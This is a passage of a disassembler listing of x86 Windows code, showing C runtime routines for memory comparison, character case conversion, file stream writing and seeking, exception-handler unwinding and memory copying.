pop edi
pop esi
locret_40EAE2: ; CODE XREF: .text:0040EA96�j
retn
; ---------------------------------------------------------------------------
loc_40EAE3: ; CODE XREF: .text:0040EAA9�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_40EB18
repe cmpsd
jz short loc_40EB18
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_40EB0B
cmp ch, dh
jnz short loc_40EB0B
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_40EB0B
cmp ch, dh
loc_40EB0B: ; CODE XREF: .text:0040EAF9�j
; .text:0040EAFD�j ...
mov eax, 0
loc_40EB10: ; CODE XREF: .text:0040EAB6�j
; .text:0040EAC9�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EB18: ; CODE XREF: .text:0040EAEB�j
; .text:0040EAEF�j
test eax, eax
jz short loc_40EAE0
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_40EB0B
sub eax, 1
jz short loc_40EB45
cmp dh, ch
jnz short loc_40EB0B
sub eax, 1
jz short loc_40EB45
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_40EB0B
sub eax, 1
loc_40EB45: ; CODE XREF: .text:0040EB27�j
; .text:0040EB30�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB48 proc near ; CODE XREF: sub_407C1D+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_40FBCF
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_40EB98
dec [ebp+var_1C]
js short loc_40EB8B
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_40EB98
; ---------------------------------------------------------------------------
loc_40EB8B: ; CODE XREF: sub_40EB48+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_40FA2B
pop ecx
pop ecx
loc_40EB98: ; CODE XREF: sub_40EB48+34�j
; sub_40EB48+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40EB48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB9E proc near ; CODE XREF: sub_411BB3+9�p
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
cmp dword_4C5998, 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
jz loc_40EC5F
cmp dword_4214E8, 0
jz short loc_40EBC8
cmp ebx, 7Fh
jbe loc_40EC5F
loc_40EBC8: ; CODE XREF: sub_40EB9E+1F�j
xor esi, esi
mov edi, 100h
inc esi
cmp ebx, edi
jnb short loc_40EBF6
cmp dword_4214F4, esi
jle short loc_40EBE7
push esi
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_40EBF2
; ---------------------------------------------------------------------------
loc_40EBE7: ; CODE XREF: sub_40EB9E+3C�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_40EBF2: ; CODE XREF: sub_40EB9E+47�j
test eax, eax
jz short loc_40EC6C
loc_40EBF6: ; CODE XREF: sub_40EB9E+34�j
mov edx, off_4214EC
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_40EC1A
and [ebp+var_2], 0
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
pop eax
jmp short loc_40EC23
; ---------------------------------------------------------------------------
loc_40EC1A: ; CODE XREF: sub_40EB9E+6B�j
and [ebp+var_3], 0
mov [ebp+var_4], bl
mov eax, esi
loc_40EC23: ; CODE XREF: sub_40EB9E+7A�j
push esi
push dword_4C59A8
lea ecx, [ebp+var_8]
push 3
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push edi
push dword_4C5998
call sub_412ED1
add esp, 20h
test eax, eax
jz short loc_40EC6C
cmp eax, esi
jnz short loc_40EC52
movzx eax, [ebp+var_8]
jmp short loc_40EC6E
; ---------------------------------------------------------------------------
loc_40EC52: ; CODE XREF: sub_40EB9E+AC�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
jmp short loc_40EC6E
; ---------------------------------------------------------------------------
loc_40EC5F: ; CODE XREF: sub_40EB9E+12�j
; sub_40EB9E+24�j
cmp ebx, 41h
jl short loc_40EC6C
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_40EC6E
loc_40EC6C: ; CODE XREF: sub_40EB9E+56�j
; sub_40EB9E+A8�j ...
mov eax, ebx
loc_40EC6E: ; CODE XREF: sub_40EB9E+B2�j
; sub_40EB9E+BF�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40EB9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC73 proc near ; CODE XREF: sub_408EF0+207�p
; sub_408EF0+29C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov [ebp+arg_0], eax
mov [ebp+var_8], edi
mov ebx, edi
jnz short loc_40EC97
xor eax, eax
jmp loc_40ED62
; ---------------------------------------------------------------------------
loc_40EC97: ; CODE XREF: sub_40EC73+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_40ECAB
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_40ECB2
; ---------------------------------------------------------------------------
loc_40ECAB: ; CODE XREF: sub_40EC73+2E�j
mov [ebp+var_4], 1000h
loc_40ECB2: ; CODE XREF: sub_40EC73+36�j
; sub_40EC73+E5�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_40ECE6
mov eax, [esi+4]
test eax, eax
jz short loc_40ECE6
cmp ebx, eax
mov edi, ebx
jb short loc_40ECCC
mov edi, eax
loc_40ECCC: ; CODE XREF: sub_40EC73+55�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_40E3A0
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_40ED28
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC73+48�j
; sub_40EC73+4F�j
cmp ebx, [ebp+var_4]
jb short loc_40ED2D
test ecx, ecx
jz short loc_40ECFA
push esi
call sub_410806
test eax, eax
pop ecx
jnz short loc_40ED66
loc_40ECFA: ; CODE XREF: sub_40EC73+7A�j
cmp [ebp+var_4], 0
mov edi, ebx
jz short loc_40ED0B
xor edx, edx
mov eax, ebx
div [ebp+var_4]
sub edi, edx
loc_40ED0B: ; CODE XREF: sub_40EC73+8D�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41330B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_40ED71
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_40ED71
loc_40ED28: ; CODE XREF: sub_40EC73+71�j
mov edi, [ebp+var_8]
jmp short loc_40ED56
; ---------------------------------------------------------------------------
loc_40ED2D: ; CODE XREF: sub_40EC73+76�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
push esi
push eax
call sub_40FA2B
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_40ED66
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
test eax, eax
mov [ebp+var_4], eax
jg short loc_40ED56
mov [ebp+var_4], 1
loc_40ED56: ; CODE XREF: sub_40EC73+B8�j
; sub_40EC73+DA�j
test ebx, ebx
jnz loc_40ECB2
mov eax, [ebp+arg_8]
loc_40ED61: ; CODE XREF: sub_40EC73+FC�j
pop esi
loc_40ED62: ; CODE XREF: sub_40EC73+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40ED66: ; CODE XREF: sub_40EC73+85�j
; sub_40EC73+CC�j
mov eax, edi
loc_40ED68: ; CODE XREF: sub_40EC73+105�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_40ED61
; ---------------------------------------------------------------------------
loc_40ED71: ; CODE XREF: sub_40EC73+AA�j
; sub_40EC73+B3�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_8]
jmp short loc_40ED68
sub_40EC73 endp
; =============== S U B R O U T I N E =======================================
sub_40ED7A proc near ; CODE XREF: sub_408EF0+1A5�p
; sub_408EF0+1F6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_40EDF8
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40ED99
cmp edi, 1
jz short loc_40ED99
cmp edi, 2
jnz short loc_40EDF8
loc_40ED99: ; CODE XREF: sub_40ED7A+13�j
; sub_40ED7A+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_40EDB1
push esi
call sub_41354B
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_40EDB1: ; CODE XREF: sub_40ED7A+28�j
push esi
call sub_410806
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_40EDC7
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_40EDDB
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40ED7A+43�j
test al, 1
jz short loc_40EDDB
test al, 8
jz short loc_40EDDB
test ah, 4
jnz short loc_40EDDB
mov dword ptr [esi+18h], 200h
loc_40EDDB: ; CODE XREF: sub_40ED7A+4B�j
; sub_40ED7A+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_4134BF
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_40EE05
; ---------------------------------------------------------------------------
loc_40EDF8: ; CODE XREF: sub_40ED7A+B�j
; sub_40ED7A+1D�j
mov dword_4C5904, 16h
or eax, 0FFFFFFFFh
loc_40EE05: ; CODE XREF: sub_40ED7A+7C�j
pop edi
pop esi
retn
sub_40ED7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE08 proc near ; CODE XREF: sub_413B3D+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_40EE08 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_40EE38 proc near ; CODE XREF: sub_4137C9+25�p
; sub_4139C1+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_40EE38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE3F proc near ; CODE XREF: sub_40EEEB+5A�p
; sub_413B3D:loc_413B60�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_40EE68
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_417E84 ; RtlUnwind
loc_40EE68: ; DATA XREF: sub_40EE3F+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_40EE3F endp
; ---------------------------------------------------------------------------
loc_40EE91: ; CODE XREF: .text:00417FE2�j
; .text:00417FEC�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_413E3D
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EEC7: ; DATA XREF: sub_40F043+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_413E3D
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEEB proc near ; DATA XREF: sub_40F094+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_40EF0C
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_40EF59
; ---------------------------------------------------------------------------
loc_40EF0C: ; CODE XREF: sub_40EEEB+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_413E3D
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_40EF4A
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40EE3F
loc_40EF4A: ; CODE XREF: sub_40EEEB+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_40EF59: ; CODE XREF: sub_40EEEB+1F�j
pop ebx
pop ebp
retn
sub_40EEEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF5C proc near ; CODE XREF: sub_413BA4+54�p
; sub_413C66+D7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_40EFB2
loc_40EF7A: ; CODE XREF: sub_40EF5C+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_40EF84
call sub_413F0C
loc_40EF84: ; CODE XREF: sub_40EF5C+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_40EF98
cmp ecx, [eax+8]
jle short loc_40EF9D
loc_40EF98: ; CODE XREF: sub_40EF5C+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_40EFA9
loc_40EF9D: ; CODE XREF: sub_40EF5C+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_40EFA9: ; CODE XREF: sub_40EF5C+3F�j
cmp [ebp+arg_4], 0
jge short loc_40EF7A
mov eax, [ebp+var_4]
loc_40EFB2: ; CODE XREF: sub_40EF5C+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_40EFC6
cmp esi, eax
jbe short loc_40EFCB
loc_40EFC6: ; CODE XREF: sub_40EF5C+64�j
call sub_413F0C
loc_40EFCB: ; CODE XREF: sub_40EF5C+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_40EF5C endp
; =============== S U B R O U T I N E =======================================
sub_40EFD6 proc near ; CODE XREF: sub_41382B+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov [eax], ecx
mov ecx, dword_4C5960
mov [eax+4], ecx
mov dword_4C5960, eax
retn
sub_40EFD6 endp
; =============== S U B R O U T I N E =======================================
sub_40EFEF proc near ; CODE XREF: sub_413963+45�p
arg_0 = dword ptr 4
mov eax, dword_4C5960
jmp short loc_40F001
; ---------------------------------------------------------------------------
loc_40EFF6: ; CODE XREF: sub_40EFEF+14�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_40F007
mov eax, [eax+4]
loc_40F001: ; CODE XREF: sub_40EFEF+5�j
test eax, eax
jnz short loc_40EFF6
inc eax
retn
; ---------------------------------------------------------------------------
loc_40F007: ; CODE XREF: sub_40EFEF+D�j
xor eax, eax
retn
sub_40EFEF endp
; =============== S U B R O U T I N E =======================================
sub_40F00A proc near ; CODE XREF: sub_413963+9�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov eax, dword_4C5960
cmp edx, eax
jnz short loc_40F020
mov eax, [edx+4]
mov dword_4C5960, eax
retn
; ---------------------------------------------------------------------------
loc_40F020: ; CODE XREF: sub_40F00A+B�j
mov ecx, eax
add eax, 4
jmp short loc_40F032
; ---------------------------------------------------------------------------
loc_40F027: ; CODE XREF: sub_40F00A+2B�j
mov eax, [eax]
cmp edx, eax
jz short loc_40F03C
mov ecx, eax
lea eax, [ecx+4]
loc_40F032: ; CODE XREF: sub_40F00A+1B�j
cmp dword ptr [eax], 0
jnz short loc_40F027
jmp sub_413F0C
; ---------------------------------------------------------------------------
loc_40F03C: ; CODE XREF: sub_40F00A+21�j
mov eax, [edx+4]
mov [ecx+4], eax
retn
sub_40F00A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F043 proc near ; CODE XREF: sub_41382B+66�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_40EEC7
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_413F40
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40F043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F094 proc near ; CODE XREF: sub_413BA4+30�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_40EEEB
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_40F115
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_4C59BC
pop ecx
pop ecx
and [ebp+var_34], 0
loc_40F115: ; DATA XREF: sub_40F094+3A�o
cmp [ebp+var_4], 0
jz short loc_40F132
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_40F13B
; ---------------------------------------------------------------------------
loc_40F132: ; CODE XREF: sub_40F094+85�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_40F13B: ; CODE XREF: sub_40F094+9C�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_40F094 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F144 proc near ; CODE XREF: sub_416D00+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40F15C
push [ebp+arg_0]
call sub_417E84 ; RtlUnwind
loc_40F15C: ; DATA XREF: sub_40F144+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40F144 endp
; =============== S U B R O U T I N E =======================================
sub_40F164 proc near ; DATA XREF: sub_40F186+A�o
; sub_40F1EE+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40F185
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40F185: ; CODE XREF: sub_40F164+10�j
retn
sub_40F164 endp
; =============== S U B R O U T I N E =======================================
sub_40F186 proc near ; CODE XREF: sub_416D00+67�p
; sub_416D00+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_40F164
push large dword ptr fs:0
mov large fs:0, esp
loc_40F1A3: ; CODE XREF: sub_40F186:loc_40F1DE�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40F1E0
cmp esi, [esp+1Ch+arg_4]
jz short loc_40F1E0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40F1DE
push 101h
mov eax, [ebx+esi*4+8]
call sub_40F21A
call dword ptr [ebx+esi*4+8]
loc_40F1DE: ; CODE XREF: sub_40F186+44�j
jmp short loc_40F1A3
; ---------------------------------------------------------------------------
loc_40F1E0: ; CODE XREF: sub_40F186+2A�j
; sub_40F186+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_40F186 endp
; =============== S U B R O U T I N E =======================================
sub_40F1EE proc near ; CODE XREF: sub_413963+4F�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_40F164
jnz short locret_40F210
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40F210
mov eax, 1
locret_40F210: ; CODE XREF: sub_40F1EE+10�j
; sub_40F1EE+1B�j
retn
sub_40F1EE endp
; =============== S U B R O U T I N E =======================================
sub_40F211 proc near ; CODE XREF: sub_413F40+1E�p
; sub_413F40+40�p
push ebx
push ecx
mov ebx, offset dword_421230
jmp short loc_40F224
sub_40F211 endp
; =============== S U B R O U T I N E =======================================
sub_40F21A proc near ; CODE XREF: sub_40F186+4F�p
; sub_416D00+78�p
push ebx
push ecx
mov ebx, offset dword_421230
mov ecx, [ebp+8]
loc_40F224: ; CODE XREF: sub_40F211+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_40F21A endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40F234 proc near ; CODE XREF: .text:00409777�p
; sub_40C1BF+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_40F234 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F260 proc near ; CODE XREF: sub_40C36E+4E�p
; sub_411CAE+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_40F280
cmp edi, eax
jb loc_40F3FC
loc_40F280: ; CODE XREF: sub_40F260+16�j
test edi, 3
jnz short loc_40F29C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40F2BC
rep movsd
jmp off_40F3AC[edx*4]
; ---------------------------------------------------------------------------
loc_40F29C: ; CODE XREF: sub_40F260+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40F2B4
and eax, 3
add ecx, eax
jmp dword ptr loc_40F2BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_40F2B4: ; CODE XREF: sub_40F260+46�j
jmp dword ptr loc_40F3BC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40F2BC: ; CODE XREF: sub_40F260+31�j
; sub_40F260+8E�j ...
jmp off_40F340[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_40F2D0
dd offset loc_40F2FC
dd offset loc_40F320
; ---------------------------------------------------------------------------
loc_40F2D0: ; DATA XREF: sub_40F260+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40F2BC
rep movsd
jmp off_40F3AC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40F2FC: ; DATA XREF: sub_40F260+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40F2BC
rep movsd
jmp off_40F3AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40F320: ; DATA XREF: sub_40F260+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_40F2BC
rep movsd
jmp off_40F3AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_40F340 dd offset loc_40F3A3 ; DATA XREF: sub_40F260:loc_40F2BC�r
dd offset loc_40F390
dd offset loc_40F388
dd offset loc_40F380
dd offset loc_40F378
dd offset loc_40F370
dd offset loc_40F368
dd offset loc_40F360
; ---------------------------------------------------------------------------
loc_40F360: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_40F368: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40F370: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_40F378: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40F380: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_40F388: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40F390: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260+E4�o
